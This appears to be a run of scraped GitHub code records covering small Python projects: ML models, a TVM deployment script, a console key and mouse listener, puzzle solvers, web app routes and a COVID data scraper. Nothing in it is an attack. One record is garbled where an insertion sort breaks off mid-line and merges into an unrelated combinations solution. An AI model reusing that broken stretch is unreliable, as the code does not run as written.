2048)\n","repo_name":"ashwinGokhale/BlindSide","sub_path":"embedded/motor.py","file_name":"motor.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"34248373718","text":"\"\"\" The model for predicting directions (left turn, right turn, straight). Model takes a parameter 'gpu' for training on GPU and testing on CPU.\n\n\"\"\"\nimport torch.nn as nn\n\nclass DirectionClassificationModel(nn.Module):\n def __init__(self, gpu=False): # Temporary GPU parameter as lazy fix for training on gpu and testing on cpu\n super(DirectionClassificationModel, self).__init__()\n self.gpu = gpu \n\n self.layers = nn.Sequential(\n nn.Conv2d(3, 16, kernel_size=3, stride=1),\n nn.ReLU(),\n nn.MaxPool2d(2, stride=1),\n nn.Conv2d(16, 32, kernel_size=3, stride=1),\n nn.ReLU(),\n nn.MaxPool2d(2, stride=1),\n nn.Conv2d(32, 64, kernel_size=3, stride=1),\n nn.ReLU(),\n nn.MaxPool2d(2, stride=1),\n nn.Flatten(),\n nn.Linear(in_features=906304, out_features=128),\n nn.ReLU(),\n nn.Linear(in_features=128, out_features=3),\n )\n\n def forward(self, x):\n if self.gpu:\n x = x.view(x.size(0), 3, 128, 128)\n else:\n x = x.view(1, 3, 128, 128)\n output = self.layers(x)\n return output\n","repo_name":"JustinBoxemDEV/SDC-HANZE-2022","sub_path":"src/MachineLearning/SupervisedLearning/Classification/DirectionClassificationModel.py","file_name":"DirectionClassificationModel.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"41720448710","text":"## ================================================\n## Listen to the keyboard\n## ================================================\nfrom pynput.keyboard import Key, Listener, Controller\nfrom pynput.mouse import Listener as MouseListener\nfrom pynput import mouse\nfrom pynput import keyboard\nfrom threading import Thread, Lock\n\n\nruning = True\n\nclass KeyMouCounter():\n\n def __init__(self):\n self.keyboard = Controller() # instantiate a keyboard controller\n self.locker = Lock()\n runing = True\n\n def on_press(self, key): # called when a key is pressed\n # print the name of the pressed key\n print('{0} pressed'.format(key))\n\n def on_release(self, key): # called when a key is released\n # print the name of the released key\n global runing\n print('{0} release'.format(key))\n if isinstance(key, keyboard.KeyCode):\n print(key.char)\n else:\n print(key)\n if key == Key.esc: # stop listening when Esc is pressed\n self.locker.acquire()\n runing = False\n self.locker.release()\n #print(\"Runging Stat\" , runing)\n print(\"Stop Keyboard listener\")\n return False # Stop listener\n\n def on_move(self, x, y): # listen for mouse movement\n #print('Pointer moved to {0}'.format((x, y)))\n pass\n\n def on_click(self, x, y, button, pressed): # listen for mouse clicks\n print('{0} at {1}'.format('Pressed' if pressed else 'Released', (x, y)))\n try:\n print(type(button))\n print(button.name)\n except:\n pass\n global runing\n #print(\"Runging Stat\" , runing)\n if not runing: # end the program once no longer running (i.e. a single mouse click after Esc ends it)\n # Stop listener\n print(\"Stop Mouse listener\")\n return False\n\n def on_scroll(self, x, y, dx, dy): # listen for the mouse scroll wheel\n #print('Scrolled {0}'.format((x, y)))\n pass\n\n def mouse_listener(self):\n print('Listener Mouse ...')\n with mouse.Events() as event:\n for i in event:\n # iterator-style usage.\n if isinstance(i, mouse.Events.Click):\n # mouse click event.\n print(i.x, i.y, i.button, i.pressed)\n\n def keyboard_listener(self):\n print('Listener Keyboard ...')\n with self.keyboard.Events() as event:\n for i in event:\n # iterator-style usage.\n if isinstance(i, mouse.Events.Click):\n # mouse click event.\n print(i.x, i.y, i.button, 
i.pressed)\n\n def lister_keyboard(self):\n print('Listener Keyboard ...')\n with Listener(on_press=self.on_press, on_release=self.on_release) as listener:\n listener.join()\n\n def lister_mouse(self):\n print('Listener Mouse ...')\n with MouseListener(on_click=self.on_click) as listener:\n listener.join()\n\n def run(self):\n t_keyboard = Thread(target=self.lister_keyboard)\n t_mouse = Thread(target=self.lister_mouse)\n\n t_mouse.start()\n t_keyboard.start()\n\n t_keyboard.join()\n t_mouse.join()\n\n\nif __name__ == \"__main__\":\n kmc = KeyMouCounter()\n kmc.run()","repo_name":"snowcooled/keymoucheck","sub_path":"counter.py","file_name":"counter.py","file_ext":"py","file_size_in_byte":3275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"28218152376","text":"def insertionSort(arr):\r\n for i in range (1, len(arr)):\r\n k = arr[i]\r\n j = i-1\r\n while j>=0 and k self.n-start+1:\n return\n \n for i in range(start,self.n+1):\n new_comb = comb+[i]\n self.helpFun(index+1, i+1, new_comb)\n\n\nclass Solution:\n def combine(self, n, k):\n \"\"\"\n :type n: int\n :type k: int\n :rtype: List[List[int]]\n \"\"\"\n res = []\n arr = [x for x in range(1, n+1)]\n curr = []\n self._helpFun(arr, k, res, curr)\n return(res)\n \n def _helpFun(self, arr, k, res, curr):\n if k == 0:\n if curr not in res:\n res.append(curr)\n return\n for i in range(len(arr)):\n newCurr = curr + [arr[i]]\n newArr = arr[i+1:]\n self._helpFun(newArr, k-1, res, newCurr)\n \nfrom itertools import combinations\n\nclass Solution:\n def combine(self, n, k):\n return list(combinations(range(1, n+1), k))\n \n def combine2(self, n, k): \n if k == 0:\n return [[]]\n return [pre + [i] for i in range(k, n+1) for pre in self.combine(i-1, k-1)]\n \n \ns=Solution()\n\nprint(s.combine(5,3))\n\n","repo_name":"fxy1018/Leetcode","sub_path":"77_Combinations.py","file_name":"77_Combinations.py","file_ext":"py","file_size_in_byte":2099,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"} +{"seq_id":"2915622247","text":"import sys\n\nimport torch\nfrom torch import nn\n\n# import torchmetrics\nfrom pytorch_lightning import LightningModule\n\n\nclass LitFCN(LightningModule):\n def __init__(self,dim_in):\n super().__init__()\n #self.save_hyperparameters()\n #self.accuracy = torchmetrics.Accuracy()\n self.dim_in = dim_in\n\n \n self.predictor=None\n if self.dim_in<=5:\n self.predictor=nn.Sequential(\n nn.Linear(self.dim_in,2),\n nn.Tanhshrink(),\n nn.Linear(2,1),\n )\n else:\n layers=[]\n n_in,n_out=self.dim_in,int(self.dim_in//2)\n while n_out>=1:\n if n_out!=1:\n layers.extend([nn.Linear(n_in,n_out), nn.Tanhshrink()])\n else:\n layers.extend([nn.Linear(n_in,n_out)])\n n_in,n_out=n_out,int(n_out//2)\n\n self.predictor=nn.Sequential(*layers)\n\n\n def forward(self,x):\n flux=self.predictor(x)\n return flux\n\n def configure_optimizers(self):\n optimizer = torch.optim.Adam(self.parameters(), lr=1e-2)\n #lr_scheduler = torch.optim.lr_scheduler.StepLR(optimizer, step_size=30, gamma=0.0001)\n #return {\"optimizer\": optimizer, \"lr_scheduler\": lr_scheduler}\n return {\"optimizer\": optimizer}\n\n\n\n def training_step(self, batch,batch_idx):\n x, y = batch\n y=y.unsqueeze(1)\n x = x.view(x.size(0), -1)\n\n y_hat = self.forward(x)\n loss_func=nn.MSELoss()\n loss = loss_func(y_hat, y)\n self.log('train_loss', loss)\n return {\"loss\":loss}\n\n def validation_step(self,batch,batch_idx):\n x, y = batch\n x = x.view(x.size(0), -1)\n y=y.unsqueeze(1)\n\n 
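# Editor's note: the insertionSort record above is cut off mid-line and runs into
# an unrelated combinations solution, so the original remainder of that file is
# not recoverable here. For reference only, a standard textbook insertion sort
# (a generic reconstruction, not the original repository's code):
def insertion_sort(arr):
    for i in range(1, len(arr)):
        k = arr[i]
        j = i - 1
        # shift every element greater than k one slot to the right
        while j >= 0 and k < arr[j]:
            arr[j + 1] = arr[j]
            j -= 1
        arr[j + 1] = k
    return arr

print(insertion_sort([5, 2, 9, 1]))  # [1, 2, 5, 9]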
y_hat = self.forward(x)\n loss_func = nn.MSELoss()\n loss = loss_func(y_hat, y)\n\n self.log('val_loss', loss)\n return {\"loss\":loss}\n\n def test_step(self, test_batch, batch_idx):\n x, y = test_batch\n x = x.view(x.size(0), -1)\n y = y.unsqueeze(1)\n\n y_hat = self.forward(x)\n loss_func = nn.MSELoss()\n loss = loss_func(y_hat, y)\n self.log_dict({\"test_loss\": loss})\n return loss\n\n def predict_step(self,data_batch,batch_idx=1):\n x=data_batch\n x=x.view(x.size(0),-1)\n y_hat=self.forward(x)\n return y_hat\n","repo_name":"ptdang1001/MPOSNN","sub_path":"src/SNN/utils/model_interface.py","file_name":"model_interface.py","file_ext":"py","file_size_in_byte":2381,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"} +{"seq_id":"3654016493","text":"import tvm\nfrom tvm import relay\nfrom tvm import rpc\nfrom tvm.contrib import util, ndk\nfrom tvm.contrib import graph_runtime\nimport numpy as np\nfrom PIL import Image\nimport time\nimport keras\nfrom keras.applications.resnet50 import preprocess_input\n\n#model_path = \"keras/mobilenetV2.h5\"\n#model_path = \"keras/densenet121.h5\"\nmodel_path = \"keras/resnet50.h5\"\n\nimage_path = \"ilsvrc2012/images/ILSVRC2012_val_00000001.JPEG\"\ntarget = \"llvm -target=aarch64-linux-android\" # target = \"opencl\"\ntarget_host = \"llvm -target=aarch64-linux-android\"\n\n# read keras model\nif \"mobilenetV2\" in model_path:\n keras_model = keras.applications.mobilenet_v2.MobileNetV2(include_top=True, weights=None, input_shape=(224, 224, 3), classes=1000)\n keras_model.load_weights(model_path)\n print(type(keras_model))\nif \"densenet121\" in model_path:\n keras_model = keras.applications.densenet.DenseNet121(include_top=True, weights=None, input_shape=(224, 224, 3), classes=1000)\n keras_model.load_weights(model_path)\n print(type(keras_model))\nif \"resnet50\" in model_path:\n keras_model = keras.applications.resnet50.ResNet50(include_top=True, weights=None, input_shape=(224, 224, 3), classes=1000)\n keras_model.load_weights(model_path)\n print(type(model_path))\n\n# preprocess image\nimage = Image.open(image_path).resize((224, 224))\ndata = np.array(image)[np.newaxis, :].astype('float32')\ndata = preprocess_input(data).transpose([0, 3, 1, 2])\nprint('input_1', data.shape)\n\n# parse model from keras\nshape_dict = {'input_1': data.shape}\nmod, params = relay.frontend.from_keras(keras_model, shape_dict) # keras -> tvm.module\nprint(type(mod))\n\n# build graph and params\nwith relay.build_config(opt_level=3):\n graph, lib, params = relay.build(mod, target=target,\n target_host=target_host, params=params)\nlib.export_library(\"/Users/liuyuanqiang/Desktop/net.so\", ndk.create_shared) # ndk \n\n# rpc tracker\ntracker = rpc.connect_tracker(\"0.0.0.0\", 9190)\nremote = tracker.request(\"RedmiK30\", priority=0, session_timeout=60)\nif target == \"opencl\":\n ctx = remote.cl(0)\nelse:\n ctx = remote.cpu(0)\nremote.upload(\"/Users/liuyuanqiang/Desktop/net.so\")\nrlib = remote.load_module('net.so')\n\n# run\nstart = time.time()\nmodule = graph_runtime.create(graph, rlib, ctx)\nmodule.set_input(**params)\nmodule.set_input('input_1', tvm.nd.array(data.astype('float32')))\nmodule.run()\ntvm_out = module.get_output(0)\nend = time.time()\n\n# get tvm output id\ntop1_tvm = np.argmax(tvm_out.asnumpy())\nprint(\"relay execution time: \", end - start)\nprint(\"relay top-1 id: {}\".format(top1_tvm))\n\n# get keras output id\nkeras_out = keras_model.predict(data.transpose([0, 2, 3, 1]))\ntop1_keras = 
np.argmax(keras_out)\nprint(\"keras top-1 id: {}\".format(top1_keras))","repo_name":"David-Xiang/DUDE","sub_path":"tvm_code/test_keras.py","file_name":"test_keras.py","file_ext":"py","file_size_in_byte":2750,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"2876071257","text":"import threading\nimport time\nimport configuration as conf\nimport io\nimport base64\n\nclass tick(threading.Thread):\n\n t=0\n tickTimes=[]\n camera=None\n move=None\n conf=None\n stopping=False\n mostRecentImageData=None\n\n def __init__(self, camera, move):\n threading.Thread.__init__(self)\n self.camera=camera\n self.move=move\n\n def doSense(self):\n imageData={}\n imageData[\"cameraStartTime\"]=time.time()\n image_stream = io.BytesIO()\n self.camera.capture(image_stream, 'jpeg', use_video_port=True)\n imageData[\"image\"]=base64.b64encode(image_stream.getvalue())\n imageData[\"cameraEndTime\"]=time.time()\n self.mostRecentImageData=imageData\n\n def getData(self):\n data={}\n data[\"mostRecentImageData\"]=self.mostRecentImageData\n return data\n\n def run(self):\n while not self.stopping:\n tickStartTime = time.time()\n self.tickTimes.append(time.time())\n # doMove(m)\n print(\"start sense: \", time.time())\n self.doSense()\n print(\"end sense: \", time.time())\n remainingTickTime = tickStartTime + conf.tickTime - time.time()\n if remainingTickTime > 0:\n print(remainingTickTime)\n time.sleep(remainingTickTime)\n self.t += 1\n\n def stop(self):\n self.stopping=True","repo_name":"andreaskdk/robo","sub_path":"command/tick.py","file_name":"tick.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"40209852637","text":"import sys\ninput = sys.stdin.readline\n\n# grid size: n, number of points to visit: m\nn, m = map(int, input().split())\n\n# the map\nmaps = [list(map(int, input().split())) for _ in range(n)]\n\n# points that must be visited\nloc = []\nfor _ in range(m):\n x, y = map(int, input().split())\n loc.append([x-1, y-1])\n\n# visited markers\nvisited = [[0 for _ in range(n)] for _ in range(n)]\n\n# directions\ndx = [0, 0, -1, 1]\ndy = [-1, 1, 0, 0]\n\n# number of paths\ncnt = 0\n\n# path search: dfs\ndef dfs(now, destIdx):\n global cnt # path count\n if now == loc[destIdx]: # if we arrived at the current target\n if destIdx == m - 1: # if it was the last point to visit\n cnt += 1\n return\n else:\n destIdx += 1 # move on to the next target\n x, y = now\n visited[x][y] = True # mark as visited\n for i in range(4):\n nx, ny = x + dx[i], y + dy[i]\n # inside the map, not yet visited, and passable\n if 0 <= nx < n and 0 <= ny < n and visited[nx][ny] == False and maps[x][y] == 0:\n dfs([nx, ny], destIdx)\n visited[x][y] = False # unmark the visit\n return \n\n# start\ndfs(loc[0], 1) # initial position, first point that must be reached\n\n# result\nprint(cnt)","repo_name":"seonwook97/Coding_test","sub_path":"Softeer/순서대로 방문하기/순서대로 방문하기.py","file_name":"순서대로 방문하기.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"40309788664","text":"from court import Court\r\n\r\n\r\nclass Stadium(Court):\r\n __name: str\r\n __common_name: str\r\n __capacity: int\r\n\r\n def __init__(self, width: float, length: float,\r\n address: str, year_built: int, name: str,\r\n common_name: str = '', capacity: int = 0) -> None:\r\n super().__init__(width, length, address, year_built)\r\n self.__name = name\r\n self.__common_name = common_name\r\n if capacity >= 0:\r\n self.__capacity = capacity\r\n else:\r\n self.__capacity = 0\r\n\r\n @property\r\n def name(self) -> str:\r\n return
self.__name\r\n\r\n @property\r\n def common_name(self) -> str:\r\n return self.__common_name\r\n\r\n @property\r\n def capacity(self) -> int:\r\n return self.__capacity\r\n\r\n @name.setter\r\n def name(self, value: str) -> None:\r\n self.__name = value\r\n\r\n @common_name.setter\r\n def common_name(self, value: str) -> None:\r\n self.__common_name = value\r\n\r\n @capacity.setter\r\n def capacity(self, value: int) -> None:\r\n if value < 0:\r\n print('Attribute error')\r\n else:\r\n self.__capacity = value\r\n\r\n def __eq__(self, other: 'Stadium') -> bool:\r\n return self.capacity == other.capacity and \\\r\n self.area() == other.area()\r\n\r\n def __ne__(self, other: 'Stadium') -> bool:\r\n return self.capacity != other.capacity or \\\r\n self.area() != other.area()\r\n\r\n def __str__(self) -> str:\r\n # the short form omits the common name; the long form includes it\r\n if self.__common_name == '':\r\n return f'A pitch built in the year ' \\\r\n f'{self.year_built}, with a length of ' \\\r\n f'{self.length} metres and a width of {self.width} metres.' \\\r\n f'\\nSurface area: {self.area()} sq m.' \\\r\n f'\\nAddress: {self.address}.' \\\r\n f'\\nName: {self.name}.' \\\r\n f'\\nStadium capacity: {self.capacity} people.'\r\n else:\r\n return f'A pitch built in the year ' \\\r\n f'{self.year_built}, with a length of ' \\\r\n f'{self.length} metres and a width of {self.width} metres.' \\\r\n f'\\nSurface area: {self.area()} sq m.' \\\r\n f'\\nAddress: {self.address}.' \\\r\n f'\\nName: {self.name}.' \\\r\n f'\\nCommon name: {self.common_name}.' \\\r\n f'\\nStadium capacity: {self.capacity} people.'\r\n","repo_name":"Malffy/Praca","sub_path":"Programowanie_Obiektowe/K1-Probne/stadium.py","file_name":"stadium.py","file_ext":"py","file_size_in_byte":2463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"43911663854","text":"from PIL import Image\r\nimport argparse\r\n\r\nparser = argparse.ArgumentParser(description='\\nThis program converts an image file to PDF...
')\r\nparser.add_argument('file_name',help='image file to convert') \r\nargs = parser.parse_args()\r\nname = args.file_name.split('-')[1]\r\nimage1 = Image.open(args.file_name)\r\nim1 = image1.convert('RGB')\r\nim1.save(name+'.pdf')","repo_name":"Priyank2000/Priyank2000","sub_path":"pdf_images/image_to_pdf.py","file_name":"image_to_pdf.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"18566174504","text":"\nclass Node:\n\n def __init__(self, val, left=None, right=None):\n self.val = val\n self.left = left # store the provided children instead of always None\n self.right = right\n\n \ndef minDepth(self):\n q = [] \n if self is None:\n return 0\n q.append({'node': self, 'depth':1})\n c = self\n while(len(q) > 0):\n i = q.pop(0)\n node = i['node']\n depth = i['depth']\n if node.left is None and node.right is None:\n return depth\n \n if node.left is not None:\n q.append({'node': node.left, 'depth': depth + 1})\n if node.right is not None:\n q.append({'node': node.right, 'depth': depth + 1})\n \n\nif __name__ == \"__main__\":\n root = Node(1) \n root.left = Node(2) \n root.right = Node(3) \n root.left.left = Node(4) \n root.left.right = Node(5) \n print(minDepth(root))","repo_name":"arun6582/Algorithm-practice","sub_path":"python/min_depth_binary.py","file_name":"min_depth_binary.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"9493364026","text":"# -*- coding: utf-8 -*-\nimport fire\nimport uvicorn\nfrom pathlib import Path\nfrom fastapi import FastAPI\nfrom nli import PytorchPredict, ONNXPredict\nfrom config import settings\nfrom data_model import InputContent, InferenceResult\nfrom custom_logging import CustomizeLogger\nfrom fastapi.encoders import jsonable_encoder\n\nconfig_path = Path(__file__).with_name(\"logging_config.json\")\nlogging = CustomizeLogger.make_logger(config_path)\n\npytorch_app = FastAPI(debug=True, title=settings.TITLE)\nonnx_app = FastAPI(debug=True, title=settings.TITLE)\napp = FastAPI(debug=True, title=settings.TITLE)\ntp = PytorchPredict(model=settings.PYTORCH_MODEL_PATH)\nop = ONNXPredict(onnx_model_path=settings.ONNX_MODEL_PATH)\n\n\n@pytorch_app.api_route(settings.PYTORCH_ROUTING, methods=[\"GET\", \"POST\", \"PUT\"], response_model=InferenceResult)\ndef pytorch_predict(request: InputContent):\n text = request.text\n result = tp.total_control(text)\n logging.info(result)\n return result\n\n\n@onnx_app.api_route(settings.ONNX_ROUTING, methods=[\"GET\", \"POST\", \"PUT\"], response_model=InferenceResult)\ndef onnx_predict(request: InputContent):\n text = request.text\n result = op.total_control(text)\n logging.info(result)\n return result\n\n\nif __name__ == '__main__':\n # fire.Fire(main)\n uvicorn.run(onnx_app, host=\"0.0.0.0\", port=8000)\n","repo_name":"Ziba-li/template_classify","sub_path":"deploy/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"60"} +{"seq_id":"8203390501","text":"from django.urls import path\n\nfrom . 
import views\n\napp_name = 'statify'\nurlpatterns = [\n path('', views.signup, name='signup'),\n path('spotifyauth', views.spotifyauth, name='spotifyauth'),\n path('callback', views.callback, name='callback'),\n path('profile', views.profile, name='profile'),\n path('logout_user', views.logout_user, name='logout_user'),\n path('login_user', views.login_user, name='login_user')\n]\n","repo_name":"XanderRiga/spotify-stats","sub_path":"statify/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"35935294528","text":"\n\n\n\nclass Stack:\n '''A last-in, first-out (LIFO) stack of items'''\n\n def __init__(self):\n '''(Stack) -> NoneType\n Create a new, empty stack.\n '''\n # this time, we'll store our stack as a dictionary\n # with the height of the item mapping to the item itself\n # we'll also need to keep track of the current height of\n # the stack\n self._contents = {}\n self._height = 0\n\n def push(self, new_obj):\n '''(Stack, object) -> NoneType\n Place new_obj on top of this stack.\n '''\n # putting a new item on top of the stack means adding it\n # to the dictionary at the current height (so the bottom\n # element will have index 0), and then increasing the\n # height accordingly\n self._contents[self._height] = new_obj\n self._height += 1\n\n def pop(self):\n '''(Stack) -> object\n Remove and return the top item in this stack.\n '''\n # top pop an item off the top of the stack, we first have\n # to decrease the height of the stack (remember that in our\n # dictionary we're indexing from 0)\n self._height -= 1\n # we don't really have to delete the item from the dictionary\n # because we'll never access it again, if we ever grow to that\n # height again, we'll just re-map the height value to a new\n # object\n return self._contents[self._height]\n\n def is_empty(self):\n '''(Stack) -> bool\n Return True iff this stack is empty\n '''\n # if our height is zero, this means our stack is empty\n return self._height == 0\n\n\nif (__name__ == '__main__'):\n # this is just some sample code that uses our stack\n # if we keep our ADT the same in each of our implementations\n # of our stack, then we should be confident that this code\n # will work identically each time\n stk = Stack()\n stk.push('a')\n stk.push('b')\n stk.push('c')\n print(stk.pop())\n stk.push('d')\n while(not stk.is_empty()):\n print(stk.pop())\n","repo_name":"OtsoValo/UTSC-Works","sub_path":"CSCA08/week9/week9_my_stack3.py","file_name":"week9_my_stack3.py","file_ext":"py","file_size_in_byte":2067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"11210431215","text":"from dbhelper import DBHelper\n\n\ndef main():\n db = DBHelper()\n while True:\n print(\"**********WELCOME**********\")\n print()\n print(\"PRESS 1 to insert new user\")\n print(\"PRESS 2 to display all user\")\n print(\"PRESS 3 to delete user\")\n print(\"PRESS 4 to Update user\")\n print(\"PRESS 5 to exit program\")\n print()\n\n try:\n choice = int(input())\n if (choice == 1):\n uid = int(input(\"Enter UserId: \"))\n username = input(\"Enter UserName: \")\n userphone = input(\"Enter User Phone: \")\n db.insert_user(uid, username, userphone)\n\n elif choice == 2:\n db.fetch_all()\n\n elif choice == 3:\n userid = int(\n input(\"Enter UserId to which you want to delete: \"))\n db.delete_user(userid)\n\n elif choice == 4:\n userid = int(input(\"Enter UserId: \"))\n newuserName = 
input(\"Enter new User Name: \")\n newphone = input(\"Enter new User Phone number: \")\n db.update_User(userid, newuserName, newphone)\n\n elif choice == 5:\n break\n\n else:\n print(\"Invalid Input ! Try again\")\n\n except Exception as e:\n print(e)\n print(\"Invalid Details ! Try again\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"pawangupta5071/Database_helper_application","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"2196123017","text":"from entity.entity import Entity\nfrom sql.sqldb import *\nfrom .factoryrepo import FactoryRepo\n\n\nclass DatabaseRepo(FactoryRepo):\n def __init__(self, table):\n import config\n self.db = Sql(config.get_config('database'))\n self.table = table\n super().__init__()\n\n def add(self, user):\n self.entities[1] = user\n\n def get(self, id):\n entity = Entity()\n entity.accessed = entity.now()\n del entity.created\n del entity.modified\n entity.id = id\n self.db.commit()\n return [i for i in self.db.select_one(self.table, id)][1:]\n\n def save(self, entity, timestamp=True):\n # verify if id exists, if exists then update else insert\n if entity.get_id() is None:\n if timestamp:\n entity.created = entity.now()\n self.db.insert(self.table, entity)\n else:\n if timestamp:\n entity.created = __class__.get(self, entity.get_id())[3]\n entity.modified = entity.now()\n self.db.update(self.table, entity)\n self.db.commit()\n # obtain last insert id in self\n entity.id = self.db.last_id(self.table)\n return entity\n\n def find(self, column, thing, element=\"*\"):\n return self.db.select_one_thing(element, self.table, column, thing)\n\n def delete(self, entity):\n self.db.delete(self.table, entity)\n self.db.commit()\n","repo_name":"LordOfNightmares/virtual-client-assistant","sub_path":"entity/databaserepo.py","file_name":"databaserepo.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"6246109005","text":"# See https://app.powerbigov.us/view?r=eyJrIjoiMjA2ZThiOWUtM2FlNS00MGY5LWFmYjUtNmQwNTQ3Nzg5N2I2IiwidCI6ImU0YTM0MGU2LWI4OWUtNGU2OC04ZWFhLTE1NDRkMjcwMzk4MCJ9. 
\n# This is a weird format of Json and it might be better to use a browser-based scrape instead of a Json download...\n\nimport requests, json, io, datetime, pathlib\nimport county_report, state_report\n\nSTATE_ABBR = 'NV'\nSTATE = 'Nevada'\nURL = 'https://wabi-us-gov-iowa-api.analysis.usgovcloudapi.net/public/reports/querydata?synchronous=true'\n\ndef scraper():\n\n payload = ''\n\n filepath = pathlib.Path.cwd().joinpath('config', 'nv_post_body.json')\n with open(filepath, 'r') as file:\n payload = file.read().replace('\\n', '')\n\n # make an HTTP web request to get the data\n response = requests.post(URL, data=payload)\n\n if response.status_code == requests.codes.ok:\n # Success - print to the console that the HTTP request succeeeded\n print(' ', STATE_ABBR, ': Downloaded succeeded')\n\n jsonPayload = json.loads(response.text)\n features = jsonPayload['results'][0]['result']['data']['dsr']['DS'][0]['PH'][0]['DM0']\n\n counties = []\n \n for feature in features:\n\n if 'S' in feature:\n continue\n \n county_object = feature['C']\n has_R = 'R' in feature\n \n deaths = 0\n\n cases_index = 3\n if has_R:\n cases_index = 2\n else:\n deaths = int(county_object[1])\n\n county_name = county_object[0]\n confirmed = int(county_object[cases_index])\n \n county = county_report.CountyReport(STATE, county_name, confirmed, deaths, -1, -1, datetime.datetime.now())\n counties.append(county)\n \n # print the number of counties we processed\n print(' ', STATE_ABBR, ':', len(counties), ' counties processed OK')\n\n # build the state-level report object that will include all of the counties\n stateReport = state_report.StateReport(STATE, STATE_ABBR, counties, datetime.datetime.now())\n \n # return the state-level report\n return stateReport \n\n else:\n # Fail\n print(' ', STATE_ABBR, ': ERROR : Web download failed - HTTP status code ', response.status_code)\n\ndef findCounty(county_name, counties):\n for county in counties:\n if county.county == county_name:\n return county\n","repo_name":"erik1066/covid-web-scraper","sub_path":"src/nv_scraper.py","file_name":"nv_scraper.py","file_ext":"py","file_size_in_byte":2457,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"60"} +{"seq_id":"73533211072","text":"import csv\nimport pandas\nimport numpy\nfrom sklearn.linear_model import Lasso\nfrom sklearn.linear_model import LassoCV\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import normalize\n\ndata = {'red': [], 'white': []}\ny = {'red': [], 'white': []}\nwith open ('winequalityN.csv') as f:\n r = csv.reader(f)\n features = next(r)\n for row in r:\n row = [x if x != '' else 0 for x in row]\n data[row[0]].append([float(x) for x in row[1:-1]])\n y[row[0]].append(int(row[-1]))\n\noptimal = 0.0\noptimal_alpha = 0.0\nfor i in range(0, 10):\n x_train_red, x_test_red, y_train_red, y_test_red = train_test_split(data['red'],\n y['red'], test_size = 0.3)\n\n lr = LassoCV(normalize=True).fit(x_train_red, y_train_red)\n\n alpha = lr.alpha_\n\n predicted_red = lr.predict(x_test_red)\n\n test_len_red = len(x_test_red)\n\n correct = 0\n\n for i in range(test_len_red):\n if(abs(y_test_red[i] - predicted_red[i]) < 1):\n correct += 1\n\n print(\"RED:\" + str((correct / test_len_red) * 100))\n print(\"ALPHA:\" + str(alpha) + \"\\n\")\n\n if(optimal < (correct / test_len_red) * 100):\n optimal = (correct / test_len_red) * 100\n optimal_alpha = alpha\n\nprint(\"OPTIMAL RED:\" + str(optimal))\nprint(\"OPTIMAL ALPHA:\" + str(optimal_alpha) + 
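# Editor's note: in the wine-quality script above, each train/test split fits its
# own LassoCV model (lr for red, then lw and lb for white and combined), and each
# must be scored with the model fitted in that same split -- predicting with a
# model fitted on different data silently reports the wrong accuracy. A minimal
# sketch of the intended pairing (hypothetical helper, not part of the original
# script):
from sklearn.linear_model import LassoCV

def fit_and_predict(x_train, y_train, x_test):
    model = LassoCV().fit(x_train, y_train)  # a fresh model for this split only
    return model.alpha_, model.predict(x_test)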
\"\\n\")\n\noptimal = 0.0\noptimal_alpha = 0.0\nfor i in range(0, 10):\n x_train_white, x_test_white, y_train_white, y_test_white = train_test_split(data['white'],\n y['white'], test_size = 0.3)\n\n lw = LassoCV(normalize=True).fit(x_train_white, y_train_white)\n\n alpha = lw.alpha_\n\n predicted_white = lw.predict(x_test_white)\n\n test_len_white = len(x_test_white)\n\n correct = 0\n\n for i in range(test_len_white):\n if(abs(y_test_white[i] - predicted_white[i]) < 1):\n correct += 1\n\n print(\"WHITE:\" + str((correct / test_len_white) * 100))\n print(\"ALPHA:\" + str(alpha) + \"\\n\")\n\n if(optimal < (correct / test_len_white) * 100):\n optimal = (correct / test_len_white) * 100\n optimal_alpha = alpha\n\nprint(\"OPTIMAL WHITE:\" + str(optimal))\nprint(\"OPTIMAL ALPHA:\" + str(optimal_alpha) + \"\\n\")\n\noptimal = 0.0\noptimal_alpha = 0.0\nfor i in range(0, 10):\n x_train_both, x_test_both, y_train_both, y_test_both = train_test_split(data['red'] + data['white'],\n y['red'] + y['white'], test_size = 0.3)\n\n lb = LassoCV(normalize=True).fit(x_train_both, y_train_both)\n\n alpha = lb.alpha_\n\n predicted_both = lb.predict(x_test_both)\n\n test_len_both = len(x_test_both)\n\n correct = 0\n\n for i in range(test_len_both):\n 